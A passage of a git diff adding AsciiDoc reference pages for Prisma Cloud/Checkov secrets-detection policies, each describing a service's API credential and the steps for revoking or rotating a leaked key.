+Heroku calls these containers "Dynos". +These Dynos can run code written in Node, Ruby, PHP, Go, Scala, Python, Java, or Clojure. +Heroku also provides custom buildpacks with which the developer can deploy apps in any other language. +Heroku lets the developer scale the app instantly just by either increasing the number of dynos or by changing the type of dyno the app runs in. + +=== Fix - Buildtime + + +*Heroku* + + + +. Revoke the Key + +. In Heroku, click on Account Settings + +. Click on API Key + +. Find the compromised key and click on Revoke + +. Monitor for abuse diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-49.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-49.adoc new file mode 100644 index 000000000..a4472e8d5 --- /dev/null +++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-49.adoc @@ -0,0 +1,46 @@ +== HubSpot API Key + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| bfdda3a2-e2d2-4bfb-ba7d-49466c108a88 + +|Checkov Check ID +|CKV_SECRET_49 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Git + +|=== + + + +=== Description + + +With the HubSpot API key, developers can create custom applications with HubSpot's APIs. +Each key is specific to a HubSpot account, not an individual user, and only one key is allowed at a time. + +=== Fix - Buildtime + + +*HubSpot To rotate your HubSpot API key:* + + +* In your HubSpot account, click the settings icon in the main navigation bar. +In the left sidebar menu, navigate to Integrations > API key. +* Click the Actions dropdown menu, then select Rotate key. +* Click Rotate and expire this key now. +Select the reCAPTCHA checkbox. +Your existing key will be deactivated and a new API key will be created. +* Click Copy and replace the deactivated API key used by your applications with this new API key. diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-5.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-5.adoc new file mode 100644 index 000000000..0dd0edbf2 --- /dev/null +++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-5.adoc @@ -0,0 +1,51 @@ +== Cloudant Credentials + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 0a69df21-a2a9-4b25-ae3b-1074d1e5e812 + +|Checkov Check ID +|CKV_SECRET_5 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Git + +|=== + + + +=== Description + + +Cloudant is a document-oriented and distributed database running on IBM Cloud. +The service can be accessed via API calls. +An optional authentication method requires a username and password. +An alternate authentication method consists of a username and the corresponding apikey. + +=== Fix - Buildtime + + +*Cloudant* + + + +. Revoke the exposed secret. ++ +The secret can be revoked from the IBM Cloudant dashboard in the Service credentials tab. + +. Clean the git history. ++ +Go under the settings section of your GitHub project and chose the change visibility button at the bottom. + +. Inspect LogDNA logs to ensure the key was not utilized during the compromised period. diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-50.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-50.adoc new file mode 100644 index 000000000..c1e088630 --- /dev/null +++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-50.adoc @@ -0,0 +1,47 @@ +== Intercom Access Token + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 1abf6697-5737-4067-8cbc-c060ca8cf331 + +|Checkov Check ID +|CKV_SECRET_50 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Git + +|=== + + + +=== Description + + +The Intercom Access Token allows access to the Intercom API. + +The Access Token is recommended for use in the following scenarios: + +* When using the API to interact with an Intercom app +* When creating scripts that push or extract data from the Intercom app +* When automating certain actions in your the Intercom app +* When programmatically accessing customer data + +=== Fix - Buildtime + + +*Intercom* + +You can regenerate the Access Token by clicking Regenerate token or uninstall this app which will revoke the Access Token (by clicking Uninstall app). + + diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-51.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-51.adoc new file mode 100644 index 000000000..e297863d6 --- /dev/null +++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-51.adoc @@ -0,0 +1,46 @@ +== Jira Token + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| afa159db-75a7-451c-9731-9a353c6e6a78 + +|Checkov Check ID +|CKV_SECRET_51 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Git + +|=== + + + +=== Description + + +In Jira, Personal access tokens (PATs) are a secure way to use scripts and integrate external applications with your Atlassian application. +If an external system is compromised, you simply revoke the token instead of changing the password and consequently changing it in all scripts and integrations. +Personal access tokens are a safe alternative to using username and password for authentication with various services. + +=== Fix - Buildtime + + +*Jira* + + + +. In your Atlassian application go to: + +. In Jira select your profile picture at the top right of the screen, then choose Personal Access Tokens . + +. Select Revoke next to the token you want to delete. diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-52.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-52.adoc new file mode 100644 index 000000000..0de882fb3 --- /dev/null +++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-52.adoc @@ -0,0 +1,65 @@ +== LaunchDarkly Personal Token + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 90828b95-50f6-42ed-bc3f-4cc8a80e0250 + +|Checkov Check ID +|CKV_SECRET_52 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Git + +|=== + + + +=== Description + + +In LaunchDarkly, all REST API resources are authenticated with either personal or service access tokens, or session cookies. +Other authentication mechanisms are not supported. +You can manage personal access tokens on your Account settings page. +You can configure a personal access token to have the same permissions that you do, or more restrictive permissions. +Your personal tokens can never do more than you can in LaunchDarkly. +Use a personal token when you want to access the LaunchDarkly API for your temporary or personal use. + +=== Fix - Buildtime + + +*LaunchDarkly* + + + +. Navigate to the Account settings page. + +. Click into the Authorization tab. + +. Find your token in the "Access tokens" section. + +. Click the overflow menu for the token and select from the menu: "Delete token": Deletes the access token. ++ +If you delete a token, API calls made with that token return 401 Unauthorized status codes. ++ +You can also use the REST API: Delete access token ++ + +[source,text] +---- +{ + "curl -i -X DELETE \\ + 'https://app.launchdarkly.com/api/v2/tokens/{id}' \\ + -H 'Authorization: YOUR_API_KEY_HERE'", +} +---- diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-53.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-53.adoc new file mode 100644 index 000000000..70b6a99db --- /dev/null +++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-53.adoc @@ -0,0 +1,46 @@ +== Netlify Token + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 516fde21-67e9-4573-bfe7-41f6c5b8f5c0 + +|Checkov Check ID +|CKV_SECRET_53 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Git + +|=== + + + +=== Description + + +Netlify provides a platform for building, deploying, and scaling websites whose source files are stored in the version control system Git and then generated into static web content files served via a Content Delivery Network. +The platform also provides services and features of serverless computing and edge computing, offering serverless functions that are version-controlled, built, and deployed alongside frontend code. +You can generate a personal access token in your Netlify user settings for manual authentication in shell scripts or commands that use the Netlify API. +If you're making a public integration with Netlify for others to enjoy, you must use OAuth2. +This allows users to authorize your application to use Netlify on their behalf without having to copy/paste API tokens or touch sensitive login info. +You'll need an application client key and a client secret to integrate with the Netlify API. + +=== Fix - Buildtime + + +*Netlify To revoke your user access token for Netlify CLI, go to your Netlify user Applications settings For access granted using the netlify login command, scroll to the Authorized applications section, and find Netlify CLI.* + + +Select Options > Revoke access. +If you manually created a personal access token, you can find it in the Personal access tokens section. +Select Options > Delete personal token. diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-54.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-54.adoc new file mode 100644 index 000000000..30af32524 --- /dev/null +++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-54.adoc @@ -0,0 +1,41 @@ +== New Relic Key + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| b2b74119-7057-4412-8b7d-fdf40e3cc916 + +|Checkov Check ID +|CKV_SECRET_54 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Git + +|=== + + + +=== Description + + +New Relic monitoring solutions use API keys to authenticate and verify user identity. +The primary key is the user key (for working with NerdGraph, our GraphQL API). +These keys allow only approved people in your organization to report data to New Relic, access that data, and configure features. + +=== Fix - Buildtime + + +*New *Relic* +You can view and manage most API keys from the API keys UI page, which is at one.newrelic.com/launcher/api-keys-ui.api-keys-launcher (from the account dropdown, click API keys). + + diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-55.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-55.adoc new file mode 100644 index 000000000..67c74cd91 --- /dev/null +++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-55.adoc @@ -0,0 +1,49 @@ +== Notion Integration Token + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 8dcf5a77-4822-49f5-ab61-fcd7c748feea + +|Checkov Check ID +|CKV_SECRET_55 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Git + +|=== + + + +=== Description + + +The Notion API uses bearer tokens to authorize requests from integrations. +As an integration developer, you'll need to choose the appropriate integration type for the integration you create. +Based on the integration type, you'll receive and store bearer tokens differently. +For both types, an integration must send the bearer token in the HTTP Authorization request header. + +=== Fix - Buildtime + + +*Notion* + + + +. Revoke the token + +. In Notion, click on Integrations + +. Click on Developers + +. Look for the integration to revoke and click on Revoke diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-56.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-56.adoc new file mode 100644 index 000000000..6b09732e6 --- /dev/null +++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-56.adoc @@ -0,0 +1,48 @@ +== Okta Token + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| ded6eeb0-ff9e-4455-bb8b-b9a5754fb758 + +|Checkov Check ID +|CKV_SECRET_56 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Git + +|=== + + + +=== Description + + +Okta API tokens are used to authenticate requests to the Okta API just like HTTP cookies authenticate requests to the Okta Application with your browser. +An API token is issued for a specific user and all requests with the token act on behalf of the user. +API tokens are secrets and should be treated like passwords. +API tokens are generated with the permissions of the user that created the token. +If a user's permissions change, then so do the token's. +Super admins, org admins, and group admins may create tokens. + +=== Fix - Buildtime + + +*Okta To revoke a token, click the trash icon at the right of the token information.* + + +Note that the icon is not always active: +* Agent tokens are revocable if the agent is not active; +otherwise, you must deactivate the agent before revoking the token. +Some agents such as the Okta AD Agent automatically revoke their tokens for you when you deactivate the agent. +* API Tokens are always revocable. diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-57.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-57.adoc new file mode 100644 index 000000000..21540ab41 --- /dev/null +++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-57.adoc @@ -0,0 +1,47 @@ +== PagerDuty Authorization Token + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| e66683fb-cce5-4b61-8a20-03fadc90d390 + +|Checkov Check ID +|CKV_SECRET_57 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Git + +|=== + + + +=== Description + + +The PagerDuty REST API supports authenticating via an account or user API token. +Account API tokens have access to all of the data on an account, and can either be granted read-only access or full access to read, write, update, and delete. +For PagerDuty accounts with Advanced Permissions, user API tokens have access to all of the data that the associated user account has access to. +Only account administrators have the ability to generate account API tokens. + +=== Fix - Buildtime + + +*PagerDuty* + + + +. In the web app, navigate to Integrations API Access Keys. + +. In the table of API access keys, select Remove next to the key you'd like to delete. + +. Confirm your selection in the browser alert. diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-58.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-58.adoc new file mode 100644 index 000000000..74e79bec6 --- /dev/null +++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-58.adoc @@ -0,0 +1,52 @@ +== PlanetScale Token + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| d671864e-5c7b-423b-bfe2-2ede45e8d18a + +|Checkov Check ID +|CKV_SECRET_58 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Git + +|=== + + + +=== Description + + +PlanetScale offers a managed database platform that is designed for developers and developer workflows. +The PlanetScale CLI allows developers to create development branches, open deploy requests, and make non-blocking schema changes directly from a terminal. +PlanetScale provides the ability to create service tokens for your PlanetScale organization via the CLI or directly in the UI. +Service tokens are not recommended for connecting to production databases. +Instead, connect securely to your database using PlanetScale connection strings. + +=== Fix - Buildtime + + +*PlanetScale* + + + +. Go to the service tokens page for your organization: app.planetscale.com + +. Click on the service token ID for the service token you would like to delete. + +. Click on the "Delete service token" button in the upper right hand corner. + +. Confirm deletion by clicking the "Delete" button in the pop-up modal. + +. Deleting a service token will sever any database connections that use the given service token. diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-59.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-59.adoc new file mode 100644 index 000000000..da5a8ed59 --- /dev/null +++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-59.adoc @@ -0,0 +1,51 @@ +== Postman API Key + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| a183a84f-e1f0-4751-bdaa-b3b799ec3dd4 + +|Checkov Check ID +|CKV_SECRET_59 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Git + +|=== + + + +=== Description + + +The Postman API endpoints enable developers to integrate Postman within the development toolchain. +Developers can add new collections, update existing collections, update environments, and add and run monitors directly through the API. +This enables them to programmatically access data stored in a Postman account. +They can also combine the Postman API with Newman to integrate Postman with a CI/CD workflow. + +=== Fix - Buildtime + + +*Postman* + + + +. Open your Postman API Keys page. + +. Select your avatar in the upper-right corner > Settings. ++ +Then select Postman API keys. + +. Once you have API keys generated you can manage them within your workspace. ++ +Select the more actions icon More actions icon next to a key to regenerate or delete it. diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-6.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-6.adoc new file mode 100644 index 000000000..1a485b578 --- /dev/null +++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-6.adoc @@ -0,0 +1,79 @@ +== Base64 High Entropy Strings + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 0723a8d8-1bd2-4ccb-afee-ddc3691ced71 + +|Checkov Check ID +|CKV_SECRET_6 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Git + +|=== + + + +=== Description + + +Entropy checks help detect unstructured secrets by measuring the entropy level of a single string. +Entropy is a concept used to assign a numerical score to how unpredictable a password is or the likelihood of highly random data in a string of characters. +Strings with a high entropy score are flagged as suspected secrets. + +=== Fix - Buildtime + + +*Multiple Services* + + + +. Revoke the exposed secret. ++ +Start by understanding what services were impacted and refer to the corresponding API documentation to learn how to revoke and rotate the secret. + +. Clean the git history. ++ +Go under the settings section of your GitHub project and chose the change visibility button at the bottom. + +. Check any relevant access logs to ensure the key was not utilized during the compromised period. + +=== Fix - Terraform + + +[source,go] +---- +{ + "resource "aws_glue_connection" "examplevpc" { + connection_properties = { + JDBC_CONNECTION_URL = "jdbc:mysql://${aws_rds_cluster.example.endpoint}/exampledatabase" + - PASSWORD = "valuethatdoesntcontainsecretword" + USERNAME = "exampleusername" + } + + + name = "example" + + physical_connection_requirements { + availability_zone = aws_subnet.example.availability_zone + security_group_id_list = [aws_security_group.example.id] + subnet_id = aws_subnet.example.id + } + +}", +} +---- + +Don't hardcode the secret in the resource, pull in dynamically from a secret source of your choice e.g. +AWS parameter store, and if already committed to source follow the git instructions stated previously. diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-60.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-60.adoc new file mode 100644 index 000000000..cef000d28 --- /dev/null +++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-60.adoc @@ -0,0 +1,51 @@ +== Pulumi Access Token + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| b2ec65ce-9bc0-463e-b8e2-92d38423183a + +|Checkov Check ID +|CKV_SECRET_60 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Git + +|=== + + + +=== Description + + +Pulumi is a modern infrastructure as code platform. +It leverages existing programming languages--TypeScript, JavaScript, Python, Go, .NET, Java, and markup languages like YAML--and their native ecosystem to interact with cloud resources through the Pulumi SDK. +A downloadable CLI, runtime, libraries, and a hosted service work together to deliver a robust way of provisioning, updating, and managing cloud infrastructure. +Organization Access Tokens provide Enterprise and Business Critical customers the opportunity to manage resources and stack operations for their organization independent of a single-user account. + +=== Fix - Buildtime + + +*Pulumi* + + + +. From the organization's homepage, follow the same steps as for a Personal Access Token: + +. Navigate to Settings > Access Tokens. + +. Choose Delete token from the action menu. ++ +You will be prompted in a dialog to confirm your choice. + +. If you choose to delete a token, its access will immediately be revoked and all further operations using it will fail as unauthorized. diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-61.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-61.adoc new file mode 100644 index 000000000..10b1dc6d3 --- /dev/null +++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-61.adoc @@ -0,0 +1,46 @@ +== Python Package Index Key + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| ce61d4a3-bc17-494a-86f1-40d26fa73b1f + +|Checkov Check ID +|CKV_SECRET_61 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Git + +|=== + + + +=== Description + + +The Python Package Index (PyPI) stores meta-data describing distributions packaged with distutils, as well as package data like distribution files if a package author wishes. +PyPI lets you submit any number of versions of your distribution to the index. +If you alter the meta-data for a particular version, you can submit it again and the index will be updated. +A PyPI API token is a string consisting of a prefix (pypi), a separator (-) and a macaroon serialized with PyMacaroonv2, which means it's the base64 of: + +=== Fix - Buildtime + + +*PyPi* + +Some content managers run regexes to try and identify published secrets, and ideally have them deactivated.* + + +PyPI has started integrating with such systems in order to help secure packages. + +For more information see https://warehouse.pypa.io/development/token-scanning.html?highlight=secrets#token-scanning[here.] diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-62.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-62.adoc new file mode 100644 index 000000000..39e88f3cd --- /dev/null +++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-62.adoc @@ -0,0 +1,56 @@ +== RapidAPI Key + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 1f01777e-9839-47c3-bd90-e840a464b17b + +|Checkov Check ID +|CKV_SECRET_62 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Git + +|=== + + + +=== Description + + +RapidAPI is used to find, test, and connect to thousands of APIs -- all with a single API key and dashboard. +It allows finding APIs, embedding them into an app and tracking usage of all endpoints. +To connect an API to a project or application, you must have an API key to authenticate your request. +Creating an app within RapidAPI generates an API key (X-RapidAPI-Key) specific to that application. +You can view analytics based on the API calls you make using this app key. + +=== Fix - Buildtime + + +*RapidAPI You can create a new API key and delete the compromised one in a few steps from the Developer Dashboard:* + + + +. Select the application with the compromised key and navigate to the Security page. + +. Click "Add New Key." You can also edit the API Key name if desired. + +. Now it is time to test the new API key. ++ +Go to the API's Endpoints tab on the RapidAPI Hub listing and select the new API key from the X-RapidAPI-Key dropdown. ++ +Click the "Test Endpoint" button to ensure the new API key is working properly. + +. Update your project with the new API key. + +. Return to the application's Security page and delete the compromised API key. diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-63.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-63.adoc new file mode 100644 index 000000000..dd5173da0 --- /dev/null +++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-63.adoc @@ -0,0 +1,46 @@ +== Readme API Key + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| be223514-2ba7-4937-80d8-2bc725d201c1 + +|Checkov Check ID +|CKV_SECRET_63 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Git + +|=== + + + +=== Description + + +ReadMe offers a managed service for maintaining a documentation site. +Each documentation site that you publish on ReadMe is a project. +Within a project there is space for documentation, interactive API reference guides, a changelog, and many more features. +Each project within your account is published separately. + +=== Fix - Buildtime + + +*Readme If one of your API keys has been leaked or if you have any security concerns about a particular API key, we strongly recommend you rotate out your API keys.* + + +You can do so by taking the following steps: +* Delete the exposed API key in your dashboard (there is a Delete option if you click the three dots on the right-hand side) +* The "Edit" and "Delete" options that are available when you click the three dots on the right-hand side of an API key +* Re-generate a new API key in its place +* Replace any usage of the leaked API key with the new one diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-64.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-64.adoc new file mode 100644 index 000000000..185a4a5cb --- /dev/null +++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-64.adoc @@ -0,0 +1,49 @@ +== RubyGems API Key + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 2a6b9d00-c551-4f66-865a-9e9950886745 + +|Checkov Check ID +|CKV_SECRET_64 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Git + +|=== + + + +=== Description + + +RubyGems is a package manager for the Ruby programming language that provides a standard format for distributing Ruby programs and libraries, a tool designed to easily manage the installation of gems, and a server for distributing them. +You can create multiple API keys based on your requirements. +API keys have varying scopes that grant specific privileges. +Using API keys with the least amount of privilege makes your RubyGems.org account more secure by limiting the impact a compromised key may have. + +=== Fix - Buildtime + + +*RubyGems* + + + +. Visit your RubyGems.org account settings page and click on API KEYS. ++ +You will be prompted for your account password to confirm your identity. + +. Use the Edit button to update the scopes of the key. + +. You can use the Reset button in the last row to delete all the API keys associated with your account. diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-65.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-65.adoc new file mode 100644 index 000000000..d0f913512 --- /dev/null +++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-65.adoc @@ -0,0 +1,46 @@ +== Sentry Token + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 77cc76d6-34e9-4aea-8168-508e8c9b35bb + +|Checkov Check ID +|CKV_SECRET_65 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Git + +|=== + + + +=== Description + + +Sentry Authentication tokens are passed using an auth header, and are used to authenticate as a user or organization account with the API. +In our documentation, we have several placeholders that appear between curly braces or chevrons, such as \{API_KEY} or which you will need to replace with one of your authentication tokens in order to use the API call effectively. + + +=== Fix - Buildtime + + +*Sentry* + + + +. Go to Settings > Developer Settings > [Your Internal Integration] + +. You can have up to 20 tokens at a time for each internal integration. ++ +These tokens do not expire automatically, but you can manually revoke them as needed. diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-66.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-66.adoc new file mode 100644 index 000000000..3783d1834 --- /dev/null +++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-66.adoc @@ -0,0 +1,47 @@ +== Splunk User Credentials + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 6933e817-4991-4f9d-9bbf-b11bacfc8c29 + +|Checkov Check ID +|CKV_SECRET_66 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Git + +|=== + + + +=== Description + + +Splunk's Credential Management page enables storing credentials for scripted or modular inputs. +Input configurations that reference credentials can use the credentials stored in Credential Management. +Developers can store credentials such as usernames and passwords, or certificates used for authentication with third-party systems. +It is discouraged to use this page to manage certificates used to encrypt server-to-server communications. + +=== Fix - Buildtime + + +*Splunk* + + + +. On the Enterprise Security menu bar, select Configure > General > Credential Management. + +. In the Action column of a credential or certificate, click Delete. + +. Click OK to confirm. diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-67.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-67.adoc new file mode 100644 index 000000000..80d35cdb6 --- /dev/null +++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-67.adoc @@ -0,0 +1,52 @@ +== Sumo Logic Keys + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| b5ba4ba2-8e01-4055-8086-e97a5ef5b598 + +|Checkov Check ID +|CKV_SECRET_67 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Git + +|=== + + + +=== Description + + +The Sumo Logic Access Keys Management API allows developers to securely register new Collectors or access Sumo Logic APIs. +This API was built with OpenAPI. +Developers can generate client libraries in many languages and explore automated testing. + +=== Fix - Buildtime + + +*Sumo Logic* + + + +. If you have the Create Access Keys role capability, you can use the Preferences page to create access keys. ++ +You can use the Preferences page to edit, activate, deactivate, and delete your access keys. + +. When you mouse over an access key on the Preferences page, several controls appear. + +. Use the trash can icon to permanently remove the access key. ++ +The key will no longer be usable for API calls. ++ +However, deleting a key used to register a Collector does not affect the Collector, as the only time a Collector uses the access key is at installation. diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-68.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-68.adoc new file mode 100644 index 000000000..9b5724c94 --- /dev/null +++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-68.adoc @@ -0,0 +1,52 @@ +== Telegram Bot Token + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| bbe5b7b7-00e1-4c4f-8838-02d913a3df11 + +|Checkov Check ID +|CKV_SECRET_68 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Git + +|=== + + + +=== Description + + +The Telegram Bot API is an HTTP-based interface created for developers keen on building bots for Telegram. + +=== Fix - Buildtime + + +*Telegram* + + + +. Revoke the token + +. Go to Telegram + +. Click on BotFather + +. Type in "/mybots" + +. Select the bot that needs to be revoked + +. Click Edit and click Revoke + +. Monitor for abuse diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-69.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-69.adoc new file mode 100644 index 000000000..746950dc2 --- /dev/null +++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-69.adoc @@ -0,0 +1,50 @@ +== Travis Personal Token + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 9337a600-63d8-4b20-8492-6f6900ed2b6f + +|Checkov Check ID +|CKV_SECRET_69 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Git + +|=== + + + +=== Description + + +Travis CI is a hosted CI service used to build and test software projects hosted on GitHub and Bitbucket. +Travis CI was the first CI service which provided services to open-source projects for free and continues to do so. +TravisPro provides custom deployments of a proprietary version on the customer's own hardware. + +=== Fix - Buildtime + + +*Travis CI* + + + +. Revoke the token + +. Go to Travis CI and click on your avatar, then click on Settings + +. Click on the Tokens tab + +. Find the compromised token and click on the trash icon + +. Monitor for abuse diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-7.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-7.adoc new file mode 100644 index 000000000..62c5d2c43 --- /dev/null +++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-7.adoc @@ -0,0 +1,54 @@ +== IBM Cloud IAM Key + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 6174425e-9502-41f2-8256-09ea40ae4d2e + +|Checkov Check ID +|CKV_SECRET_7 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Git + +|=== + + + +=== Description + + +The IBM Cloud Identity and Access Management (IAM) service manages keys that can give access to infrastructure API and to resources. + +=== Fix - Buildtime + + +*IBM Cloud* + + + +. Revoke the exposed secret. ++ +To delete an API key, complete the following steps: + +. In the console, go to Manage > Access (IAM) > API keys. + +. Identify the row of the API key that you want to delete, and select Delete from the Actions List of actions icon menu. + +. Then, confirm the deletion by clicking Delete. + +. Clean the git history. ++ +Go under the settings section of your GitHub project and chose the change visibility button at the bottom. + +. Check any relevant access logs to ensure the key was not utilized during the compromised period. diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-70.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-70.adoc new file mode 100644 index 000000000..02168b6bc --- /dev/null +++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-70.adoc @@ -0,0 +1,53 @@ +== Typeform API Token + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 4d0f2321-6866-4fa9-b57c-1d7db2801acb + +|Checkov Check ID +|CKV_SECRET_70 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Git + +|=== + 